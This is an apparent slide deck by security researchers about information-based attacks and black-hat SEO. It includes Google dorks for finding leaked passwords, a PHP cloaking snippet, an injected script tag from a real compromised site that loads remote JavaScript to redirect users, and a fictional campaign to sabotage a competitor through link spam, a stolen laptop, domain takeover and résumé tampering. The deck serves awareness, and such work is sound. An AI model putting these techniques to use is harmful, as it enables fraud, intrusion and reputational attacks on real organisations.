small treatise about e-manipulation for honest...

IntroductionInformation based attacks

Search engine optimizationOnce upon a time. . .

Small treatise about e-manipulation for honestpeople

Information based attacks in the Internet

Frederic RaynalSogeti / Cap Gemini – MISC magazine

fred(at)security-labs.orgfrederic.raynal(at)sogeti.com

Francois GaspardNew Zealand Telecom International

fg(at)tnzi.comkad(at)miscmag.com

F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 1/59



Storybook

Attacking with no limit

Information warfare : often restricted to information as a contents

Hacking : often restricted to a technical exploit

What if we merge both ?

⇒ Attacking with both the content and the container

Information based operations : deception, intoxication,misinformation,. . .Technical operation : Search Engine Optimization as a mean toemphasize the information we want




CollectRecruitArmPropagate

Roadmap

1 Information based attacks

2 Search engine optimization

3 Once upon a time. . .





(Short and inaccurate) Summary of Information warfare

2 kinds of orientation

Information management in order to achieve information dominance

Use information to produce knowledgeOthers have to run after you to keep up-to-date

Information used as a weapon

Dominance is one goal, not the only oneThink also of deception, intoxication or misinformation, . . .





Information based attacks (IBA)

Collect

Arm

RecruitPropagate

HumanNewspapers

Internet

ConsumersResearchersJournalists

ArticlesInterviews

Books

Newspapersleaflets

Web sites





Roadmap

1 Information based attacksCollectRecruitArmPropagate







Collect

Where to gather information on the Internet

Google, MSN, yahoo,. . . , only see 10% of the web !

Ex. : social networks websites (Linkedin, orkut, twitter, facebook,. . . )

Use the appropriate tool depending on the information you arelooking for :

Ex. : Federal Funding Accountability and Transparence (FFATA) forcontracts with the US government

Perimeter of a network has become from known to blurred

Perimeter of information is out of control. . .





Google Hacking

Fun and profits

Finding passwords

inurl :passwd.txt (1st result in google.com :WebAdmin :aeYYajmW204V6)

Owned websites

intitle :"hacked by" : imaginative pictures. . .intitle :tt2.swi : compromised websites installing a java trojan

Entertainment

intitle :"Live View / - AXIS" | inurl :view/view.shtml :some surveillance camssite :free.fr intitle :"index of" mp3 : p2p outdated





Roadmap








Recruit

Populate the attackers

Infiltrate where they already are

Stay hidden as much as possible : tor, open proxies, open WiFi, . . .

Create your own contesting

Opposition website : federate all opponents at one place





Opposition website : jeboycotteDanone.com





Roadmap








Arm : battlefield == the Internet

There is life outside the Internet

Consequences, answers to our actions can be lead outside of theInternet

Combining it with others battlefields is more efficient : law suits,finance, information in newspapers or leaflets, . . .

Internet howto

Websites are spread all over the Internet

Add websites under your control

A human looks for an information

Spread information on the Internet, push it to the user

The results are found according to search engines

Change the results by tricking the search engines





Usual attacks

Using information to attack

Intoxication : attempt to misguide the interpretations, the reasoningof the target, that is its analysis capacities

Ex. : spreading a wrong information, ”false/false” strategyEx. : change the content of a website according to who comes

Deception : can be either based on hiding (e.g. camouflage,blinding) or simulation (create, lure, invent)

Ex. : WW2, when false military bases were created in order to abusethe German on the d-day locationEx. : abuse search engines to warp the results

Misinformation : based on alteration, removal, addition and so on ofinformation

Ex. : the supposed lethal benzene in the bottles of PerrierEx. : hoaxes, rumors spreading from a forum to another one, then bymail, and so on





Roadmap








Propagate

Organize knowledge to export the battle

Increase the doubts toward the target in the public

Increase the bad consciousness of the target itself

Questions and answers

What if you can increase the perception of all our vectors and in the sametime, decrease the perception of the target’s answers ?⇒ Where SEO comes into play . . .




White Hat SEOBlack Hat SEOAdvanced examplesAggressive Black Hat SEO

Roadmap








Definitions

Web Spam

The practice of manipulating web pages in order to cause search enginesto rank some web pages higher than they would without any manipulation.

Search engine optimization (SEO) [?]

SEO is the process of improving the volume and quality of traffic to a website from search engines via ”natural” (”organic” or ”algorithmic”) searchresults for targeted keywords.





Why/How would I do SEO?

Motives

Users trust search engines as a means of finding information

⇒ Exploit this trust

Users usually do not look past the first ten results returned by thesearch engine

⇒ Exploit this laziness

A matter of color

White hat SEO : a site conforms to the search engines’ guidelinesand involves no deception

Black hat SEO : attempts to improve rankings in ways that aredisapproved of by the search engines, or involve deception





Roadmap


2 Search engine optimizationWhite Hat SEOBlack Hat SEOAdvanced examplesAggressive Black Hat SEO






A quick overview of White Hat SEO

Usual guidelines

Keywords : be creative, avoid generic keywords

Architecture : page rank computed according to {in|out}coming links

Content : need to be innovative and refreshed regularly

⇒ Guidelines are not written as a series of rules

Strategy : long term, no deception

Create content for users, not for search engines

Make that content easily accessible to the spiders

⇒ Content indexed by SE is the same as the one seen by users





Roadmap








A quick overview of Black Hat SEO

Spam web for profit : online pharmacy industry [?]

Many industries prefer not to spam directly (due to anti-spam lawsin US & Europe)

They create an affiliate program

⇒ Sales increase : regular incomes thanks to affiliate

⇒ Limited Liability : affiliate used as escape goat

How some affiliation programs allow to spam ?

No terms of agreement at the sign-up page

Some companies operate in jurisdiction where spam is not illegal(ex. Seychelles)

Spam is ”restricted” to email spam





Black Hat SEO is a myth. . . or not [?]





A quick overview of Black Hat SEO

Strategy : short term, deception

Content indexed by SE is often different from the one seen by users

Most techniques are nasty, some are illegal

A few basic examples

Content spam : altering the view of a SE over a page

Invisible text, keyword stuffing, doorway page, scraper sites,. . .

Link spam : take advantage of link-based ranking algorithms

Link farms, hidden links, sybil attacks, spam blogs, pagehijacking, . . .

World-writable spam : add links to sites editable by users

Blog entries, forums, wikis, referrer spamming, . . .





Roadmap








Cloaking

Goal

Modify the content of the page according to the parameters

Cloaking for dummies

User agent cloaking : change page depending on who comes

i f ( s t r p o s ($ SERVER [ "HTTP_USER_AGENT" ] , "Googlebot" ) ) {i n c l u d e ( "googlebot -special.html" ) ;

} e l s e {// display real page

}

IP cloaking : change page depending on where a request comes from

$ i p = s t r v a l ($ SERVER [ "REMOTE_ADDR" ] )





A(n in)famous example : spider view of bmw.de





A(n in)famous example : human view of bmw.de





Solving captcha

Goal

Automatic registration to forums, post comments on blogs, . . .

Captcha for dummies [?]

Remove the background : denoising

Join points in the letters : filtering

Derotate the letters : geometric transformation

Read the letters : pattern recognition





Solving captcha : phpbb2 [?]





Real case : who wants certified viagra (1/3)





Real case : certified viagra at university (2/3)

http ://spirit.dos.uci.edu/interfaith/ ?page=254

User clicks on 2nd answer, trusting the .edu

PR : 6/10 – Backlinks : 3420Site runs Nucleus CMS v3.23 (current : 3.32)

Flaw in default skin allows to inject code in generated pages :

<s c r i p t s r c="http :// focusa.net/gcoxiio.js"></s c r i p t >

gcoxiio.js redirects depending on the referer :

Referer : www.google.fr/search ?q=certified+viagra&ie=utf-8Redirection :

i f ( document . r e f e r r e r . toLowerCase ( ) . indexOf ( ’viagra ’)!=−1)l o c a t i o n . h r e f=’http :// pillsonline.biz/viagra.htm’ ;

User is redirected to http ://pillsonline.biz/viagra.htm


h

h




Real case : pills online (3/3)





Roadmap








Black Hat SEO reversed

Goal

Decrease page rank of competitors’ websites

Some nasty but legal ideas. . .

Inject poison keywords to the target’s website : sex, drug, medicine,viagra, casino. . .

Google browling : add links to the target from many bad sites

Even better with blacklisted websites !

Google Washing : use an old domain you own to duplicate thecontent of the target’s website, then report the target as duplicatecontent ⇒ SE will ban the newest

And many more ! ! !




The main strategyWhite ops based on SEOBlack ops based on hacking

Roadmap








Situation

Players

Proctor : a french IT consulting company

Limited resources, driven by cost killing

Tonton : an indian IT consulting company

Many men at work cheaper than european ones

Comments

Goal : Tonton wants to enter the European market

Vector : buy a well known local company, Proctor

Mean : exhaust Protor’s resource so that it need helps

Limit : do not deteriorate too much Proctor’s image





Roadmap



3 Once upon a time. . .The main strategyWhite ops based on SEOBlack ops based on hacking





Buying Proctor : the main strategy

Marry me

Tonton propose a partnership to Proctor :

A big big (and lucrative) contract in India, where Proctor wants togrowProctor must propose to Tonton other contracts in Europe whereProctor wants to find partners

The 1st indian contract is really interresting for Proctor

Tonton gives next other (rotten) contracts to Proctor on the Indiamarkets

Results

Proctor : resources consumed in several markets, new businesses,lawsuits

Tonton : internal view of Proctor, cheaper resources involved





Buying Proctor : the main strategy

Tonton & Proctor

negociate

T & Panswer (and

win) a 1st big contract

Contractfor P

Lot of workSmall benefits

LawsuitsContract

for P

Contractfor T

T : Tonton (indian cie)P: Proctor (european cie)PR: Public Relation

India

a





Buying Proctor : drug the salesmen of Proctor

Happiness or deception for the groom

Provide a nice clients list to several salesmen ⇒ consume energytrying to reach them

Invitation to tender : identify them and gives them to Proctor ⇒consume energy trying to win them

Hire away salesmen : show them life is better somewhere else ⇒cause internal tensions and resignation

Results

Proctor : salesmen will be busy as they have never been, goal beingto saturate them

Tonton : learn the european market with the watcher, wait forexhaustion





Buying Proctor : drug the salesmen

Tonton & Proctor

negociate

T & Panswer (and


Contractfor P


LawsuitsContract

for P

Contractfor T


India

a

Paris

Clients list given to

salesmenT puts watchers on .fr's markets

Many invitations to tender

Hire away salesmen

T + PR Exhibitions Visitorslists





Roadmap








Buying Proctor : life-in-IT-consulting.org

Time for opposition

Currently no website on life and business in IT consulting ⇒ createone, promote it

Use contacts found during information gathering to provide inputs

Contact a PR agency to promote the articles (propose interestingand new content ! ! !)

Use white hat SEO to enforce the visibility

Never target directly Proctor

⇒ We have created a very efficient long-term influence tool





Buying Proctor : life-in-IT-consulting.org

Tonton & Proctor

negociate

T & Panswer (and


Contractfor P


LawsuitsContract

for P

Contractfor T


India

a

Paris




Hire away salesmen


SEO

www.Life-in-it-consulting.org

WorkersFormer workers

ClientsPR => press

"bad" content

salary study

inform





Buying Proctor : aggressive SEO to shut up Proctor

The sound of silence

Google bowling : create many backlinks to Proctor from ”bad”websites (racist, sex, drugs, online casino, . . . )

Create ”bad” websites with the same keywords as ProctorUse blacklisted websites to link with Proctor

Duplicate content : find or create duplicate content on Proctor’swebsite

Use blogs, forum, . . . , to have many links pointing to the same pagehttp://proctor.com/blogs?lang=frhttp://proctor.com/blogs?lang=en

Link farm : automatically create many websites dealing with Proctorhaving many many many links to Proctor





Buying Proctor : aggressive SEO to shut up Proctor

Tonton & Proctor

negociate

T & Panswer (and


Contractfor P


LawsuitsContract

for P

Contractfor T


India

a

Paris




Hire away salesmen


SEO



ClientsPR => press

"bad" content

salary study

inform

SEO

Link farms

Google bowling

Flaw exploitation

Google washingproctor.com





Roadmap








Buying Proctor : owning the local network

One laptop stolen is the key to everything. . .

Standard station locadm : ********locuser : qwerty

Backup Server+ master

sv_deploy : d3pl0y75

Administrator : $admin$

locadm

Projectrv : rv

Administrator :*******

PrintingServer

jdupont : ********Administrator :

(vide)

DB Serveradmprov : *******admsql : ******

srvadm : srv0dmsqlserver / sa

empty pwd

rv

2 domain controlers1289 accounts

8 adminAdministrator (********)

jrichard (********)jdupont (********)jkevin (********)dvador (********)samva (********)cveso (********!)obade (********)File and

printing servers

admprov

Several servers (Lotus Notes,

mails, ...)

Administrator

known passwordweak password

jdupont





Buying Proctor : owning the local network

Tonton & Proctor

negociate

T & Panswer (and


Contractfor P


LawsuitsContract

for P

Contractfor T


India

a

Paris




Hire away salesmen


SEO



ClientsPR => press

"bad" content

salary study

inform

SEO

Link farms

Google bowling

Flaw exploitation


LAN

Steal laptop

Own AD Own

SMTP

Own www noise

Poison keywordsCloaking





Buying Proctor : when human (resources) is the weak link

Hiring away people

Focus on identified key people and send them (better) job proposal

Use the access to the LAN to get the resumes of all engineers,spread them on the Internet : some competitors will know what todo with them

Hiring process : hunting ghosts

People tracking resumes on the Internet are searching in the samefew sites : make the access to these sites difficult

Either on the proxy or the (shared) storage place, change what lookslike email address or phone number in resumes : people will be muchmore difficult to reach





Buying Proctor : when human (resources) is the weak link

Tonton & Proctor

negociate

T & Panswer (and


Contractfor P


LawsuitsContract

for P

Contractfor T


India

a

Paris




Hire away salesmen


SEO



ClientsPR => press

"bad" content

salary study

inform

SEO

Link farms

Google bowling

Flaw exploitation


LAN

Steal laptop

Own AD Own

SMTP

Own www noise

Poison keywordsCloaking

HR Hire away

Key people

CVs send to Recruitment offices

Articles

steal leak

inform

Recruitment process

Fake resumesWarp resumes

Sites maintenance





Conclusion

Mixing everything in a clever way

Attacking with information is complex but difficult to oppose

Attacker has the initiative, a real advantageQuite easy (with time but no mean) to amplify the attack

SEO is a mix of following guidelines, cleverness and hacking

Usually applied on our own website (thus information)Can also be applied by everyone on anybody’s website

⇒ Mixing both is really efficient

The Internet is realy well suited to propagate information (e.g.deception, misinformation, intoxication)Content (information) is emphasize thanks to container (SEO)Do not forget you can also combine with other tricks from otherfields





Q & (hopefully) A





References I

Search engine optimizationhttp ://en.wikipedia.org/wiki/Search engine optimization

Captcha Breaking W/ PHPBB2 Examplehttp ://www.bluehatseo.com/user-contributed-captcha-breaking-w-phpbb2-example/

Page Hijack : The 302 Exploit, Redirects and Googlehttp ://clsc.net/research/google-302-page-hijack.htm

Web spam techniquesR. S. Liverani –

http ://malerisch.net/docs/web spam techniques/web spam techniques.html


small treatise about e-manipulation for honest...

Documents